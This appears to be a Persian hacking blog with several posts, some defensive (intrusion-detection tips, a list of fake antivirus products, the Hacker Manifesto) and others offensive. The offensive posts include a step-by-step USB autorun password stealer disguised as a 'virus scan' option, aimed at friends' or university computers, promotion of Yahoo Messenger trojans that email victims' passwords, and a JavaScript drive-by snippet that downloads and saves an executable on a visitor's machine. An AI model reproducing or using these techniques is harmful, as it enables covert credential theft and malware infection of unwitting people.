tkh بازدید : 95 چهارشنبه 17 آبان 1391 نظرات (0)
 
ز این که هک شده اید حس عجیب و مضحکی دارید، اما دقیقاً نمی دانید در مرحله ی بعدی چکار کنید. اگر مانند اکثر مردم باشید، نمی دانید الزاماً باید کجا را بگردید تا شواهدی برای به خطر افتادن سیستم تان بیابید. حال نگاهی می اندازیم به چند مورد از شواهد رایجتر که ممکن است پس از ایجاد عیب در سیستم پیدا کنید.
user account های مشکوک می بایست غیر فعال شده و جستجو کنیم چه کسی و چرا آن را ایجاد کرده است. اگر سیستم auditing (بازرسی) بدرستی فعال شده باشد، audit log ها (ثبتهای بازرسی) نشان خواهند داد چه کسی آنها را ایجاد نموده است. اگر بتوانید تاریخ و زمان ایجاد account را پیدا کنید و آن account در اثر یک هک بوجود آمده باشد، شما یک قالب زمانی خواهید داشت که می توان در آن به جستجوی دیگر رویدادهای audit log که ممکن است مرتبط باشد پرداخت.

به منظور اینکه متوجه شوید آیا برنامه ی مخربی ارتباطات ورودی را تحت کنترل دارد - که می تواند به عنوان یک پورت پنهانی برای هکر استفاده شود - از ابزارهایی مانند TCPView مربوط به Sysinternals یا Fpipe مربوط به Foundstone استفاده کنید. این ابزارهای ویندوز نشان می دهند چه برنامه هایی در حال استفاده از هر یک از پورت های باز سیستم شما هستند. در مورد سیستمهای یونیکس از netstat یا lsof که درون سیستم عامل قرار دارند استفاده کنید. از آنجا که ممکن است یک هکر باهوش netstat و lsof شما را با نسخه های تروجانی (که پورت های باز شده توسط هکرها را نشان نمی دهد) جایگزین کند، بهترین کار این است که این سیستم قربانی را با استفاده از پورت اسکنر گمنام و رایگان nmap (از سایت insecure.org) از کامپیوتر دیگر اسکن کنید. این امر به شما دو دیدگاه مختلف از پورت های باز سیستم می دهد.
هکری که یک سرور ویندوز را مورد حمله قرار می دهد، ممکن است برنامه های اجرا شده را از طریق registry در نواحی ذیل اضافه یا جایگزین کند:

• HKLM > Software > Microsoft > Windows > CurrentVersion> Run

• HKCU > Software > Microsoft > Windows > CurrentVersion> Run

نرم افزارهای مخرب نیز ممکن است از طریق دستورهای اجرای سیستم عامل اجرا شود. به منظور اینکه ببینید چه برنامه هایی در دستور اجرای یک سیستم ویندوز قرار گرفته است، به command prompt بروید و تایپ کنید AT . در یک سیستم یونیکس از فرمان های cron یا crontab استفاده کنید تا لیست فعالیت هایی را که در دستور اجرا (schedule) قرار دارند ببینید.

هکرانی که به سیستم یونیکس حمله می کنند، ممکن است از یک root kit استفاده کنند که به آنان کمک می کند با استفاده از یک خلأ آسیب پذیری در سیستم عامل یا برنامه های نصب شده، به root access دست پیدا کنند. با توجه به آن که برای هکران root kit های زیادی وجود دارد، تعیین این که کدام فایل ها دستکاری شده اند بسیار مشکل است. برنامه هایی وجود دارند که به این امر کمک می کنند، مانند chrookit.
برای یک هکر هزاران راه ممکن وجود دارد تا ردپای خود را بپوشاند، اما جستجو در موارد فوق شروع بسیار خوبی برای گشت و گذار شما جهت تشخیص خطرات سیستم و حملات هکرها است.
منبع:پی سی پدیا.
tkh بازدید : 108 چهارشنبه 17 آبان 1391 نظرات (0)

 133t Speak چيست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:


0 <= O
1 <= L; I
2 <= Z
3 <= E
4 <= A
5 <= S
6 <= G
7 <= T
8 <= B
| <= L; I
@ <= at (duh)
$ <= S
)( <= H
}{ <= H
/\/ <= N
\/\/ <= W
/\/\ <= M
|> <= P; D
|< <= K
ph <= f
z <= s

}{3 $|>34|< z <= he speak



توصيه من اينه که از اين معادل‌ها تا جايی که می‌تونيد استفاده نکنيد. فقط ياد بگيريد که کم نياريد.

tkh بازدید : 142 چهارشنبه 17 آبان 1391 نظرات (0)

امروز یه روش جالب برای هك تمامی پسوردهای موجود در یك كامپیوتر به شما آموزش خواهم داد، ابتدا توضیح بدم این روش بسیار ساده شما میتوانید با یك فلش و اتصال اون به هر كامپیوتری بدون هیچ مشكل پسوردها رو در داخل فایل TXT ذخیره سازی كنید و در فرصت مناسب تری آنها رو مشاهده نمایید، شما در این روش میتوانید به پسوردهای مسنجر از جمله MSN, Yahoo, AOL, Windows messenger و پسورد اكانتهای ذخیره شده در Outlook Express, SMTP, POP, FTP و یوزر و پسوردهای ذخیره شده در فایرفاكس و اینترنت اكسپلوره دسترسی پیدا كنید، این روش رو میتونید بر روی دوستانتون یا كامپیوتر دانشگاهتون امتحان كنید و از نتیجه اون شگفت زده خواهید شد.
برای ساخت این ابزار هك باید شما رو با چند نرم افزار آشنا كنم 



اين تصوير كوچك نمايي شده.براي ديدن تصوير با سايز اصلي اينجا كليك نماييد.سايز واقعي تصوير539x225
 

MessenPass: بازیابی یوزرنیم و پسورد نرم افزارهای مسنجر MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM

دانلود



اين تصوير كوچك نمايي شده.براي ديدن تصوير با سايز اصلي اينجا كليك نماييد.سايز واقعي تصوير623x212
 

Mail PassView: بازیابی یوزرنیم و پسورد نرم افزارهای مدیریت ایمیل مانند Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free شما با این نرم افزار میتوانید اكانت های HotMail, Yahoo!, Gmail را نیز هك كنید 
دانلود



اين تصوير كوچك نمايي شده.براي ديدن تصوير با سايز اصلي اينجا كليك نماييد.سايز واقعي تصوير612x200
 

IE Passview: ابزار كوچكی است كه به وسیله آن یوزرنیم و پسوردهای ذخیره شده در مرورگر اینترنتی اینترنت اكسپلوره را مشاهده نمایید این نرم افزار بر روی IE نسخه 7 و v4.0 – v6.0 به خوبی كار میكند
دانلود


اين تصوير كوچك نمايي شده.براي ديدن تصوير با سايز اصلي اينجا كليك نماييد.سايز واقعي تصوير701x270
 

Protected Storage PassView: بازیابی تمامی پسوردهای كه در Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords و ... ذخیره شده
دانلود



اين تصوير كوچك نمايي شده.براي ديدن تصوير با سايز اصلي اينجا كليك نماييد.سايز واقعي تصوير564x379
 

PasswordFox:PasswordFox ابزار كوچكی است كه به شما اجازه مشاهده پسورد و نام كاربری های موجود در موزیلا فایرفاكی و دریگر مرورگرها كه بصورت پیشفرض خیره شده و مربوط به پروفایلهای مختلف است را دریافت كنید و شامل Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename میباشد
دانلود
این مرحله شامل آشنایی با نرم افزارهایی بود كه قرار با اونها كار كنیم
ابتدا شما این 5 نرم افزار را كه معرفی كردم را دانلود كنید و پس از خارج كردن اونها از فایل zip فایلهای .EXE اونها رو به فلشتون منتقل كنید یعنی فایلهای mspass.exe, mailpv.exe, iepv.exe, pspv.exe و passwordfox.exe رو باید كپی كنید


اكنون Notepad را باز كنید و دستور زیر را واد نمایید
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

حالا فایل رو save كنید سپس نام فایلتان را كه New Text Document.txt نام دارد به autorun.inf تتغییر دهید
حالا فایل autorun.inf را copy كنید به فلشتان

یك بار دیگر notepad را باز كنید این بار این كد را وارد نمایید

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt


حالا فایل رو save كنید سپس نام فایل رو از New Text Document.txt به launch.bat تغییر دهید و launch.bat را داخل فلش دیسكتان copy كنید
حالا همه چی آماده هست و شما میتوانید پسوردهای موجود بر روی هر كامپیوتری كه دلتان میخواهد بدست آورید
1- شما فلش رو به كامپوتر متصل میكنید و حالت autorun بصورت pop-up باز میشود
2- بر روی پنجره pop-up كه باز شده شما گزینه اول را كه (Perform a Virus Scan) است انتخاب میكنید
3- حالا به سرعت تمام پسوردها در یك چم بهم زدن بر روی فایلهای TXT ذخیره میشوند

شما میتوانید با كمی ویرایش در كدهای بالا مسیر ذخیره سازی TXT حاوی پسورد ها را در فولدر دیگری ذخیره كنید در ویندوز 7 كه بصورت پیشفرض حالت autorun غیر فعال شده یا بر روی ویندوزهایی كه این عمل انجام شده شما میتوانید بر روی فایل Lunch.bat كلیك كنید یا بر روی درایو فلش راست كلیك كنید و Autorun را انتخاب كنید

منبع
tkh بازدید : 105 چهارشنبه 17 آبان 1391 نظرات (0)

هكرهاي كلاه سفيد؛ شيطان‌هاي بي آزار
خبرگزاري فارس: هكرهاي كلاه سفيد با هدف آگاهي كاربران از حفره ها و آسيب پذيري هاي موجود در فضاي مجازي اقدام به هك مي‌كنند؛ جالب است بدانيد كه مخترع وب نيز خود جزو اين دسته از هكرها بوده است.


به گزارش خبرنگار فناوري اطلاعات فارس، اين دسته از هكرها كه به هكرهاي اخلاقي هم معروف هستند توسط شركت هاي مختلف تجاري و سازمان هاي اداري استخدام مي شوند تا از ميزان آسيب پذيري سيستم هاي مختلف گزارش ارائه دهند. 
برخي ديگر از اين هكرها بدون كسب اجازه از شركت هاي مختلف فعال هستند، اما قوانين را نقض نمي كنند و دست به اقداماتي جالب و خلاقانه مي زنند. 
در اين بخش، تعدادي از معروف ترين هكرهاي كلاه سفيد را معرفي مي كنيم كه بر خلاف گروه اول يعني هكرهاي كلاه سياه، با هدف آگاهي كاربران از حفره ها و آسيب پذيري هاي موجود در فضاي مجازي اقدام به هك مي‌كنند. 

*- استفان وزنياك: او كه همراه با استيو جابز شركت اپل را تاسيس كرد، از جمله افراد خلاق و هكرهاي كلاه سفيد معروف دو دهه اخير است. وي مدال ملي فناوري و دكتراي افتخاري از دو دانشگاه كترينگ و نوا را دريافت كرده است. 
وزنياك هك كردن را با ابداع روشي براي دورزدن سوييچ هاي مراكز تلفن آغاز كرد. او از اين طريق موفق شد به رايگان تماس هاي تلفني راه دور برقرار كند. وي با همكاري جابز محصولاتي موسوم به جعبه آبي را كه با همين هدف طراحي كرده بودند در ابتداي دهه 80 به هم دانشگاهي هايشان فروختند. وزنياك يك بار با استفاده از همين دستگاه به رايگان به شخص پاپ در واتيكان زنگ زد و ادعا نمود هنري كيسينجر سياستمدار كهنه كار آمريكايي است! 
وي به خاطر همين رفتارهايش از دانشگاه اخراج شد و همراه با استيو جابز به طراحي اولين نمونه از رايانه هاي شخصي شركت اپل مشغول شدند. آنها اين كار را از گاراژ خانه جابز شروع كردند و وزنياك بيشتر در زمينه طراحي سخت افزار فعال بود. وزنياك بعد از بالارفتن سنش ترجيح داد از هك كردن فاصله بگيرد وبيشتر به فعاليت هاي انسان دوستانه و آموزش در حوزه فناوري بپردازد. 

*- تيم برنرز لي: برنرز لي مخترع وب است و شايد از اينكه نام او در اينجا به عنوان يك هكر كلاه سفيد مطرح شده تعجب كنيد. اما او هم در زماني كه در دانشگاه آكسفورد درس مي خواند با هك كردن رايانه هاي عمومي دانشگاه و قطع دسترسي دوستانش دردسر ساز شد و دسترسي او به رايانه ها از سوي مسئولان قطع شد. البته او در همان زمان با ساخت رايانه هاي شخصي با استفاده از اجزاي معيوب تلويزيون ها و ديگر وسايل الكترونيك سعي مي كرد مفيد هم باشد! 
وي پس از آنكه در سازمان تحقيقاتي اروپايي سرن مشغول به كار شد، سيستمي را براي تسهيل به اشتراك گذاري اطلاعات ميان محققان ابداع كرد. او بعدها با تكميل همين ايده وب را اختراع كرد. در سال هاي بعد او كنسرسيوم WWW يا W3C را براي ارتقاي استانداردهاي تحت وب بنيان نهاد و اين كنسرسيوم تاكنون فعال بوده است. 

*- لينوس توروالدز: توروالدز مردي است كه سيستم عامل متن باز لينوكس را ابداع كرد و حتما از شنيدن اينكه او هم روزي روزگاري يك هكر بوده تعجب كرده ايد. اما واقعيت آن است اين مهندس هم زماني براي تفريح و خنده به هك كردن مي پرداخته و به گفته خودش براي آنكه سر از كار سيستم هاي عامل دربياورد تلاش مي كرده به آنها نفوذ كند. وي انواع سيستم هاي عامل اوليه دهه هاي 80 و 90 و حتي برخي بازي هاي ويديويي را هك كرد تا از نحوه عملكرد آنها مطلع شود. 
او در سال 1991 هسته اوليه لينوكس را بنيان نهاد و با توزيع عمومي و رايگان كدهاي برنامه نويسي آن موجب ارتقاي كيفيت و كاركردهاي آن شد. اما امروزه نام او به عنوان يكي از مهم ترين افراد تاثيرگذار در دنياي نرم افزارهاي رايانه اي مطرح است. 

*- ريچارد سالتمن: ريچارد سالتمن يكي از حاميان اصلي نرم افزارها و سيستم عامل هاي متن باز است. او هم هك كردن را در دانشگاه MIT آغاز كرد. 
وي كه از محدود كردن دسترسي دانشجويان به برخي از رايانه ها ناراحت بود، افزودن كلمه عبور به هر سيستم رايانه اي را محدود مي كرد. تغيير كلمات عبور و ارسال پيام به كاربران در مورد از كار انداختن كلمه هاي عبور از جمله ديگر شيرين كاري هاي او بود. وي حتي چاپگرها را هم هك مي كرد و پيام هاي مورد نظر خود را بر روي كاغذ پرينت مي گرفت و منتشر مي كرد. او امروزه زندگي خود را وقف ترويج فرهنگ استفاده از نرم افزارهاي متن باز نموده است.
منبع

tkh بازدید : 111 چهارشنبه 17 آبان 1391 نظرات (0)

 


 


مانیفست هکر یا بیانیه هکر یا The Hacker Manifesto متنی است که هکری به نام منتور (Mentor) در سال ۱۹۸۶ نوشته است. این بیانیه کوتاه پس از دستگیری منتور توسط پلیس نوشته شده و در نشریه زیرزمینی فرک شماره ۱، نسخه ۱ فایل ۳ از ۱۰ چاپ شد.
این بیانیه یکی از متون مرجع فرهنگ هکرها است و خواندن آن می‌تواند نمایانگر روحیه و دیدگاه هکرهای نسل اول به دنیا باشد. مانیفست هکرها، راهنمایی است برای هکرهای تمام دنیا و زیربنای کوتاهی برای اخلاقیات پذیرفته شده در این جامعه که می‌گوید توانایی‌های فنی به جای مقاصد خودخواهانه و صدمه زننده به دیگران، باید برای ساخت و گسترش مرزهای جهان آزاد بکار برده شود.
در زیر متن بیانیه هکرها را به آن شکلی که در مجله فرک ۸ ژانویه ۱۹۸۶ منتشر شده می‌خوانید:
/وجدان یک هکر/
نوشته
+++منتور+++
نوشته شده در ۸ ژانویه ۱۹۸۶ امروز یک نفر دیگر دستگیر شد. همه روزنامه‌ها در مورد آن نوشته‌اند. «نوجوانی در رسوایی جرایم کامپیوتری دستگیر شد»، «هکر بعد از دستکاری در بانک دستگیر شد»، ... . 
بچه‌های لعنتی. همه مثل هم هستند. 

اما آیا شما هرگز در برنامه‌های روانشانسی و تکنومغزهای ۱۹۵۰تان به عمق چشم‌های یک هکر نگاه کرده‌اید؟ آیا هیچ وقت فکر کرده‌اید که چه چیزی او را ساخته و چه افکاری به او شکل داده؟ 

من یک هکر هستم، وارد دنیای من شوید... 
دنیای من با مدرسه شروع شد... من از اکثر دانش‌آموزها باهوش‌تر بودم و مزخرفاتی که درس می‌دادند حوصله من را سر می‌برد... 
لعنت به احمق‌ها. همه مثل هم هستند. 

من در دبیرستان هستم. به معلم گوش می‌دهم که برای دفعه پانزدهم مشغول توضیح روش‌های کاهش اصطکاک است. من این را می‌فهمم. «نه خانم اسمیت. من نمی‌توانم مشقم را روی کاغذ نشان بدهم. من آن را در ذهنم حل کرده‌ام...» 

بچه لعنتی. احتمالا آن را کپی کرده. آن‌ها همه مثل هم هستند. 

من امروز یک کشف کردم. یک کامپیوتر کشف کردم. یک لحظه صبر کنید! این عالی است. هر کاری که به آن بگویم می‌کند. اگر من اشتباهی کند دلیلش این است که من گند زده‌ام و نه به این خاطر که من را دوست ندارد...
 
یا به این خاطر که از من می‌ترسد...
یا به این خاطر که فکر می‌کند من باهوشم...
یا به این خاطر که درس دادن را دوست ندارد و نمی‌خواهد اینجا باشد...
بچه لعنتی. تنها کاری که می‌کند بازی کردن است. همه مثل هم هستند. 

و بعد اتفاق افتاد... دری به جهانی باز شد... پالسی الکتریکی مانند ماده ای اعتیاد آور از خط تلفن خارج شد و من را از ناتوانی‌های رومزه‌ای که می‌دیدم خلاص کرد.
 
«همین است... این جهانی است که من به آن تعلق دارم...» من اینجا همه را می‌شناسم... حتی اگر آن‌ها را ندیده باشم، حتی اگر هیچ وقت با آن‌ها حرف نزده باشم، شاید در آینده هم هیچ وقت خبری از آن‌ها نگیرم اما همه آن‌ها را می‌شناسم...
بچه‌های لعنتی. دوباره گند زده‌اند به خط تلفن... همه‌شان مثل هم هستند. 

شما فکر می‌کنید می‌دانید که همه مثل هم هستیم... در روزهایی که ما هوس استیک داشتیم، در مدرسه با قاشق به ما غذای بچه می‌دادند. تکه گوشت‌هایی که به ما می‌دادید قبلا جویده شده بودند و مزه‌ای نداشتند. ما توسط سادیست‌ها احاطه شده بودیم و آدم‌های مریض به ما بی‌توجهی می‌کردند. بعضی‌ها هم بودند که چیزهای خوبی برای درس دادن داشتند اما آن‌ها قطره‌هایی بودند نایاب در بیابانی بی‌انتها. 


حالا این دنیای ما است... دنیای الکترون و سوییچ و زیبایی پهنای باند. ما از سیستم‌های موجود بدون اینکه پول بدهیم استفاده می‌کنیم ولی اگر به خاطر آن شکم‌پرست‌های سودجو نبود که لازم داشته باشند پولشان را صرف این کنند که رسانه‌ها به ما مجرم بگویند، این سرویس‌ها باید بسیار ارزانتر بودند. ما کشف می‌کنیم... و شما به ما مجرم می‌گویید. ما به دنبال دانش می‌گردیم.. ما شما به ما مجرم می‌گویید. ما بدون رنگ پوست، بدون ملیت و بدون گرایشات مذهبی در دنیا زندگی می‌کنیم و شما به ما مجرم می‌گویید. شما بمب اتم می‌سازید، شما جنگ شروع می‌کنید، شما می‌کشید، شما تقلب می‌کنید و به ما دروغ می‌گویید و سعی می‌کنید ما باور کنیم که این چیزها برای ما خوب است، اما ما هستیم که مجرمیم. 


بعله من مجرمم. جرم من کنجکاوی است. جرم من قضاوت کردن در مورد انسان‌ها نه بر اساس ظاهر که بر اساس آنچه می‌گویند و آنچه فکر می‌کنند. جرم من این است که از شما باهوش‌ترم، جرمی که هرگز به خاطر آن مرا نخواهید بخشید. 


من یک هکرم، و این بیانیه من است. شما شاید بتوانید این یک نفر را متوقف کنید اما نمی‌توانید جلوی همه ما را بگیرید... به هرحال، همه ما مثل هم هستیم. 


+++ منتور +++
این مقاله (بیانیه) در سایت های زیادی وجود دارد و متن آن روی تی شرت و گجت های مختلف هم یافت می شود. حتی در فیلم های سینمایی هم آن را می بینید. مثلا در آخرین مورد در فیلم سینمایی شبکه اجتماعی این بیانیه را روی دیوار اتاق مارک زاکربرگ موسس فیسبوک مشاهده می کنید.
tkh بازدید : 91 چهارشنبه 17 آبان 1391 نظرات (0)
هدیدهای مختلف در دنیای کامپیوتر و اینترنت سبب شده که کاربران همیشه به دنبال روش های گوناگونی برای امن کردن کامپیوترهای خود باشند. بهترین آنتی ویروس موجود چیست؟ از چه فایروالی استفاده کنم و انواع و اقسام سوالاتی مانند این احتمالا ذهن شما را هم به خود مشغول کرده. اما بهتر است که به جای گشتن به دنبال بهترین ها، مراقب باشید که در دام نرم افزار های امنیتی جعلی گرفتار نشوید.
همین جستجوی همیشگی برای نرم افزارهای امنیتی سبب شده که بازاری هم برای کلاهبرداری های امنیتی به وجود بیاید. بعضی شرکت ها و افراد نرم افزارهایی تولید می کنند که ادعا می کنند آنتی ویروس های بسیار قوی و موثری هستند. آنها به خوبی محصول خودشان را در اینترنت تبلیغ می کنند و در نتایج جستجو همیشه در ردیف های اول قرار دارند. همین سبب می شود که کاربران را ترغیب به دانلود و نصب نرم افزار خود کنند.

اگر فریب چنین نرم افزارهایی را بخورید و آنها را نصب کنید خودتان را به دردسر بزرگی انداخته اید در واقع به دست خودتان یک نرم افزار مخرب را روی سیستم تان نصب کرده اید.

تعداد زیادی از این نرم افزارها درون خودشان یک تروجان مخفی دارند که اطلاعات کاربران را سرقت می کنند. هنگام نصب برخی از این نرم افزارهای جعلی، با تولبارهای جدید روی مرورگر یا اسکرین سیور های جدید روی کامپیوترتان مواجه می شوید. حتی اگر کامپیوتر شما عاری از ویروس و فایل های مخرب باشد آنها به صورت دروغین برایتان چند ویروس روی کامپیوترتان پیدا می کنند و به شما می گویند که برای پاک کردن آنها باید پول پرداخت کنید.

بعد از نصب این نرم افزار های جعلی معمولا باید منتظر یکی از این سناریوها باشید:
- شما را مجبور به پرداخت پول کنند.
- به شما یک پیام دروغین نشان می دهند که در کامپیوترتان تعدادی ویروس، بدافزار یا تصاویر مستهجن یافت شده است.
- کاری می کنند که شما فکر کنید کامپیوتر قفل کرده، کرش کرده یا ری استارت شده است.
- بخشی از سیستم عامل را غیرفعال می کنند تا جلوی پاک شدن خودشان را بگیرند.
- یک بد افزار واقعی روی کامپیوتر نصب می کنند! البته شما از این موضوع مطلع نمی شوید.

این نرم افزار ها در اینترنت به وفور یافت می شوند و اغلب تلاش می کنند که اسم خودشان را هم شبیه نرم افزارهای مشهور امنیتی جا بزنند. برای مثال: ANG Antivirus نسخه جعلی از نرم افزار آنتی ویروس مشهور و خوب AVG Antivirus است. حتی آدرس وب سایت های این نرم افزار ها هم بسیار فریبنده است و باید مراقب باشید.

نکته مهم در اینجا است که نرم افزار های امنیتی را فقط از سایت های معتبر و منابع قابل اطمینان دریافت کنید و هرگز به سایت های متفرقه و نتایج جستجو اعتماد نکنید.

این وبلاگ نرم افزار های امنیتی جعلی را شناسایی و لیست می کند. با دیدن لیست نرم افزار های درون آنها می توانید اطلاعات مفید و جالبی در این مورد به دست بیاورید.

کد:
http://bharath-m-narayan.blogspot.com

در پایان هم می‌توانید یک لیست نمونه از نام تعدادی از نرم افزارهای قلابی امنیتی را ببینید:

* Advanced Cleaner
* AlfaCleaner
* Alpha AntiVirus
* ANG Antivirus (knock-off of AVG Anti-virus)
* Antimalware
* AntiSpyCheck 2.1
* AntiSpyStorm
* AntiSpyware 2009
* Antivirus Soft
* Antivirus System PRO
* AntiSpyware Bot from 2Squared Software
* AntiSpywareExpert
* AntiSpywareMaster
* AntiSpywareSuite
* AntiSpyware Shield
* Antivermins
* Antivirus 2008
* Antivirus 2009
* Antivirus 2010 (also known as Anti-virus-1)
* Antivirus 360
* Antivirus Pro 2009
* AntiVirus Gold
* Antivirus Live
* Antivirus Master
* Antivirus XP 2008
* Antivirus Pro 2010
* Antivirus System PRO
* Avatod Antispyware 8.0
* Awola
* BestsellerAntivirus
* Cleanator
* ContraVirus
* Control Center
* Cyber Security
* Doctor Antivirus
* Doctor Antivirus 2008
* DriveCleaner
* Dr Guard
* EasySpywareCleaner
* Errorsafe
* Green Antivirus 2009
* IE Antivirus (aka IE Antivirus 3.2)
* IEDefender
* InfeStop
* Internet Antivirus (aka Internet Antivirus Pro, distributed by plus4scan.com)
* Internet Security 2010
* KVMSecure
* Live PC Care
* MacSweeper
* MalwareCrush
* MalwareCore
* MalwareAlarm
* Malware Bell (a.k.a. Malware Bell 3.2)
* Malware Defender (not to be confused with the HIPS firewall of the same name)
* Malware Defense
* MS Antivirus
* MS AntiSpyware 2009
* MaxAntiSpy
* My Security Wall
* MxOne Antivirus
* Netcom3 Cleaner
* Paladin Antivirus
* PCSecureSystem
* PC Antispy
* PC AntiSpyWare 2010
* PC Clean Pro
* PC Privacy Cleaner
* PerfectCleaner
* Perfect Defender 2009
* PersonalAntiSpy Free
* Personal Antivirus
* Personal Security
* PAL Spyware Remover
* PCPrivacy Tools
* PC Antispyware
* PSGuard
* Privacy Center
* Rapid AntiVirus
* Real AntiVirus
* Registry Great
* Safety Alerter 2006
* Safety Center
* SafetyKeeper
* SaliarAR
* SecureFighter
* SecurePCCleaner
* SecureVeteran
* Security Scan 2009
* Security Tool
* Security Toolbar 7.1
* SiteAdware
* Security Essentials 2010
* Smart Antivirus 2009
* Soft Soldier
* SpyAxe
* Spy Away
* SpyCrush
* Spydawn
* SpyGuarder
* SpyHeal (a.k.a SpyHeals & VirusHeal)
* SpyMarshal
* Spylocked
* SpySheriff (a.k.a PestTrap, BraveSentry, SpyTrooper)
* SpySpotter
* SpywareBot (Spybot - Search & Destroy knockoff, Now known as SpywareSTOP).
* Spyware Cleaner
* SpywareGuard 2008
* Spyware Protect 2009
* SpywareQuake
* SpywareSheriff (often confused with SpySheriff)
* Spyware Stormer
* Spy Tool
* Spyware Striker Pro
* Spyware Protect 2009
* SpywareStrike
* SpyRid
* SpyWiper
* SysGuard
* System Antivirus 2008
* System Live Protect
* SystemDoctor
* System Security
* Total Secure 2009
* TrustedAntivirus
* TheSpyBot (Spybot - Search & Destroy knockoff)
* UltimateCleaner
* VirusHeat
* VirusIsolator
* Virus Locker
* VirusProtectPro (a.k.a AntiVirGear)
* VirusRemover2008
* VirusRemover2009
* VirusMelt
* VirusRanger
* Virus Response Lab 2009
* VirusTrigger
* Vista Antivirus 2008
* Volcano Security Suite
* Win 7 Antivirus 2010
* WinAntiVirus Pro 2006
* WinDefender (not to be confused with the legitimate Windows Defender)
* Windows Police Pro
* Windows Protection Suite
* WinFixer
* WinHound
* Winpc Antivirus
* Winpc Defender
* WinSpywareProtect
* WinWeb Security 2008
* WorldAntiSpy
* XP AntiSpyware 2009
* XP Antivirus 2010
* XP-Shield
* Zinaps AntiSpyware 2008
tkh بازدید : 101 پنجشنبه 11 آبان 1391 نظرات (1)

خوب امروز اموزش رفتن تو روم با اسم سفیدو میگم براتون

 


وارد صفحه اصلی روم بشید دکمه alt رو بگیرید و عدد 255 رو تو اعداد ماشین حساب کیبرد بزنید یه فاصله میوفته تو جای که اسم مینویسید ورود رو بزنید و برید حال کنید

نظر یادت نره

tkh بازدید : 112 پنجشنبه 11 آبان 1391 نظرات (1)

حالا برای هک ایدی با برنامه میزارم دان کنید وهک کنید ولی سوئ استفاده نکنید!!!!!!!!

 

این برنامه کارش اینه که شما فایل رو میسازید و به طرف میدیدو بعداز اینکه قربانی ایدیشو خاموش روشن کنه پسوردو چیزهای دیگر که شما مایل به هک انها بودید به ایمیلتون فرستاده میشود نظر یادت نره!!!! 

لینک دانلود :



هک و بوت آی دی یاهو مسنجر با Magic Ps Final v1.5 and Y Intai 2.6 And Grab N Crack

 

با سلام . بعد از مدت ها و درخواست بالا کاربران برای قرار دادن نرم افزار هک یاهو سه نرم افزار با نام های Magic Ps Final v1.5 ، Y! Intai 2.6 و Grab N Crack را که دارای قابلیت فراوان و اینکه برروی ورژن های جدید مسنجر 100% جواب میدهد را ارئه کردیم که به اختصار هر کدام را توضیح می دهیم.
برنامه Magic-PS-Final یکی از بهترین تروجان های هست که به دوباره پا به عرصه یاهو گذاشته و این برنامه قادر هست که پسورد تمامی ورژنهای یاهو را به صورت PM نشان دهد.
ویژگی ها :
 ارسال پسورد تمامی ورژن های یاهو ،  ارسال یوزر اکانت اینترنت ، ارسال نام کامپوتر ، ارسال OS Name  ، ارسال Win User Name ، غیر فعال کردن Taskmanager ، غیر فعال کردن Y! Save Pass
نرم افزار Y! Intai دارای قابلیت های فراوانی از قبیل :
- چک کردن وضعیت افراد در یاهو مسنجر ،  اضافه کردن به لیست دوستان بدون اجازه ،  مشاهده وبکم دیگران به صورت Anonymous ،  بوت کردن
با  برنامه Grab N Crack میتوانید بدون فرستادن هیچ گونه فایلی پسورد ایدی ياهوي طرف را بست آورید فقط باید شخص مذکور را به روم دعوت کنید. کار کردن با برنامه هم آسان است و نیازی به توضیح ندارد!
  پسورد فايل فشرده : www.rasekhoon.net

  پسورد فايل فشرده : www.rasekhoon.net

دانلود برنامه



tkh بازدید : 89 پنجشنبه 11 آبان 1391 نظرات (0)

تروجان براي ياهو مسنجر تا۸.۱ [تروجان]

 

يه تروجان براي سند كردن پسوورد ياهو مسنجر تا 8.1 كه شما مي تونيد به وسيله اين تروجان معين كنيد كه پسوورد به email شما فرستاده شود يا براي شما به صورت افلاين پيغام گذاشته شود و همچنين مي توانيد در قسمت binder تروجان را با فايل مورد نظر پيوند دهيد.

download

tkh بازدید : 112 پنجشنبه 11 آبان 1391 نظرات (0)
هك ايدي در يك كليدیکشنبه یکم بهمن 1385 17:45
خوب امروز روشی برای شما کاربران گرامی سایت آماده کردم که با استفاده از این روش میتوانید یک تروجان بر روی یک کلاینت آپلود کنید آموزش: ۱- برای این کار ابتدا یک تروجان می سازید و در یک سایت ( تروجان ) آپلود کنید. ۲- سپس کد زیر را کپی کرده و در NotePad پست کنید ۳- در قسمت YOur Trojan.exe آدرس فایل سرور را وارد کنید ( آدرس فایل آپلود شده ) ۴- سپس نوت پد را با پسوند HTML سیو کنید و صفحه HTML را هم آپلود کنید ۵- در نهایت آدرس آپلود شده صفحه HTML را برای فردی که می خواهید هک شود ارسال کنید و با کلیک بر روی لینک فرد 
 
s=new ActiveXObject("ADODB.Stream"; 
s.Mode=3; 
s.Type=1; 
s.Open(); 
x=new ActiveXObject("Microsoft.XMLHTTP"; 
x.Open("GET","
x.Send(); s.Write(x.responseBody); 
s.SaveToFile("C:Program FilesYahoo!MessengeYpager.exe",2); 
 
md="
"classid="clsid:11111111-1111-1111-1111-111111111111""+ 
" codebase="c:/Program Files/YPagr.exe">"; 
w=createPopup(); 
w.document.clear(); w.document.write(md); 
tkh بازدید : 94 پنجشنبه 11 آبان 1391 نظرات (0)

من این مطالب رو از سایت:

http://aseman.wordpress.com/

براتون می نویسم.

امیدوارم کسی رو هک نکنید و اگه کردید با یه هکر کلاه سیاه در بیوفتید!



یکی از متداول ترین Trojan هایی که در حال حاضر بین کاربران به خصوص ایرانی ها رایج شده و کار آن هم فقط دزدیدن و ارسال ای دی و کلمه عبور (پسوردیاهو مسینجر میباشد برنامه Magic PS هست.شما می توانید نسخه 1.15 magic ps را ازwww.sendmefile.com0596045 دانلود کنید.
آموزش جز به جز این برنامه:



